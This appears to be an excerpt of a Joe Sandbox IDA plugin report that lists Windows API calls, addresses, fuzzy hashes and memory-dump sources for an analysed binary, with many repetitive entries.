                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00D197BA,FF8BC369,00000000,00000002,00000000,?,00D15ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00D06F41), ref: 00D1974E
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00D19755
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00CEF27B
                                                                                                                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00CEF289
                                                                                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CEF29F
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00CEF2B1
                                                                                                                                                                                                                                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00D332D8
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3288985973-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00CF3006
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                  • String ID: CALL
                                                                                                                                                                                                                                                                  • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                  • Opcode ID: 59b24c8b82c8c3fa5dc5a4e55a4eb9afe33551416611b614de45778d572c4e52
                                                                                                                                                                                                                                                                  • Instruction ID: 13cb534747701be791bb47c7591ab21556a43f8c23c055b674c83f883ac7be99
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59b24c8b82c8c3fa5dc5a4e55a4eb9afe33551416611b614de45778d572c4e52
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 432279B0608645DFC764CF24C880B2ABBF1BF88314F24895DF59A8B3A1D771E945DB62
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 72dd24b25d634908c1691eab2d43d0a06236f02d4c76a1080bee331727cd79a6
                                                                                                                                                                                                                                                                  • Instruction ID: 4a9eb33af7ac2c7a58206a0ecf0b6d1af7dd12f009bd9fcd7137f4ba5d046a3c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72dd24b25d634908c1691eab2d43d0a06236f02d4c76a1080bee331727cd79a6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B32BE70A00209EFCB20DF55C891BBEB7B4FF14314F188558E955AB2A1E771EE44DBA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00D2413B
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CE55D1,?,?,00D24B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00CE5871
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00CE3A76
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                  • String ID: X
                                                                                                                                                                                                                                                                  • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                  • Opcode ID: c93880b1cf02b6dd6c78ad52940aca2140ebd5b196bf2233c9e054332d5e14bc
                                                                                                                                                                                                                                                                  • Instruction ID: 98cbe59b3282e0450c1dfde3c7bd7fa5cf641943a323cf80f22d5c1f91295a38
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c93880b1cf02b6dd6c78ad52940aca2140ebd5b196bf2233c9e054332d5e14bc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22219071A002989BDB11DF95DC09BEE7BF8AF49304F008019E549A7381DBF59A899FB1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00CE3A3C
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                  • Opcode ID: 3b664799b6898f6f8e7d8f4b88a66856847308a938888329db6b509496e8d7e0
                                                                                                                                                                                                                                                                  • Instruction ID: eb6320b18fd21982665b4ce0d827fc4dc16d4c0baba3086159b6414ab7bf2576
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b664799b6898f6f8e7d8f4b88a66856847308a938888329db6b509496e8d7e0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13317F71504341CFD321DF65D8887A7BBE8FB48318F00092EE69987341E775AA84CB62
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsThemeActive.UXTHEME ref: 00CE333D
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00CE32FB
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00CE3312
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00CE3368,?), ref: 00CE33BB
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00CE3368,?), ref: 00CE33CE
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00DB2418,00DB2400,?,?,?,?,?,?,00CE3368,?), ref: 00CE343A
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00DB2418,?,?,?,?,?,?,?,00CE3368,?), ref: 00CE34BB
                                                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00CE3377
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6f8a9a46663f70f41c792d63038b50c63093ec6af0e9889ebe40d5db25db6cf6
                                                                                                                                                                                                                                                                  • Instruction ID: 8e7289cc48a30277c3229daee8bf5eb1ea5e09799479fe11c3f1570df80c4989
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f8a9a46663f70f41c792d63038b50c63093ec6af0e9889ebe40d5db25db6cf6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1F03A32554384DFE711AB61FC0EB3537E0AB00719F044A19BA09CA3E2DBBAA1919B74
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseHandleSleep
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 252777609-0
                                                                                                                                                                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                  • Instruction ID: a3681b6e6d047d3cd199e0b1e300fbd3f5cd40fc9f91fd68af18a068cd97e54b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1931C070A00105EBC718CF58D490B69FBA6FB49300F2886A5E44DCB296D732EDC1CBE0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00CECEEE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                  • Opcode ID: d740edf8857930392c970b869261021554d2401452ebffd8892c1a6e70595818
                                                                                                                                                                                                                                                                  • Instruction ID: a6df6f9929c256070f5736f75ec0e6e85aa5b0af98ceae7741dcb27362cccc82
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d740edf8857930392c970b869261021554d2401452ebffd8892c1a6e70595818
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A32B175A00289DFCB20CF59C885ABEB7B5FF44350F288059E916AB351C735EE42DB61
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LoadString
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7e1a345f7e16b2dfdc87c7b6d2043929f31e21db98391d485d7bda4e4ed1bff4
                                                                                                                                                                                                                                                                  • Instruction ID: d6e5c60ac25a5680645af893c3d6453f1c57017c388f2ff77b14beeff49b0c81
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e1a345f7e16b2dfdc87c7b6d2043929f31e21db98391d485d7bda4e4ed1bff4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80D14D74A0424ADFCB14DF98C8819EEBBB5FF48314F144159E915AB391DB31AE45CFA0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 4fa5a447abe55752e09b81bc948ae8563657df35e1093ca1290a800954619e65
                                                                                                                                                                                                                                                                  • Instruction ID: d04d161d5c7af4e426c112de1cf047eeeca075a4c1482059948276bda20a555d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fa5a447abe55752e09b81bc948ae8563657df35e1093ca1290a800954619e65
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB51C635A04204AFDB20DF68C840BA97BA1EF85364F298168E85CDB7D1D771ED42CB70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00D4FCCE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BuffCharLower
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                  • Opcode ID: 98f455bf38d322995818e4da868b861ea49c52e8f2e671dbad2fe538be563019
                                                                                                                                                                                                                                                                  • Instruction ID: dcb85c6b423755b12dfac174670147ad94dbda466f288d0feb729c589708f100
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98f455bf38d322995818e4da868b861ea49c52e8f2e671dbad2fe538be563019
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC41D672900209AFCB11DFA8C8809AEB7B8EF44314F24453EE556D72A1EB70DE45CB70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00CE668B,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE664A
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00CE665C
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE663E: FreeLibrary.KERNEL32(00000000,?,?,00CE668B,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE666E
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE66AB
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D25657,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE6610
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00CE6622
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE6607: FreeLibrary.KERNEL32(00000000,?,?,00D25657,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE6635
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __wsopen_s
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D14FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00D1319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00D15031
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D153DF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 614378929-0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 176396367-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00D5F987
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                  • Opcode ID: 613e9dbdec22f590a1bfbda2714db427b6ce68bec2115b3b4e5980bbba13cbad
                                                                                                                                                                                                                                                                  • Instruction ID: 94399a4d09a27e14f8e76203f12fb573e76aa7397a928c8182d18e99864cfad7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 613e9dbdec22f590a1bfbda2714db427b6ce68bec2115b3b4e5980bbba13cbad
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3F08176600205BFCB04EBA5DC46E9E7BB9EF55710F000054F909DB261DA70AA45CB71
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00D1319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00D15031
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5c2573b6b0a109dd81556d44802cbe99a19b602c2bc8741d599b0cec980b90fa
                                                                                                                                                                                                                                                                  • Instruction ID: bcdd207ff160643672c8582b0c7aa2ce3804ec96d5114fc9d670f2e6b490b629
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c2573b6b0a109dd81556d44802cbe99a19b602c2bc8741d599b0cec980b90fa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07F0B432510E20FADB311AA6FC01B9B3758AFC57E0F194111BC08D7198DE68D88146F0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00D06A79,?,0000015D,?,?,?,?,00D085B0,000000FF,00000000,?,?), ref: 00D13BC5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
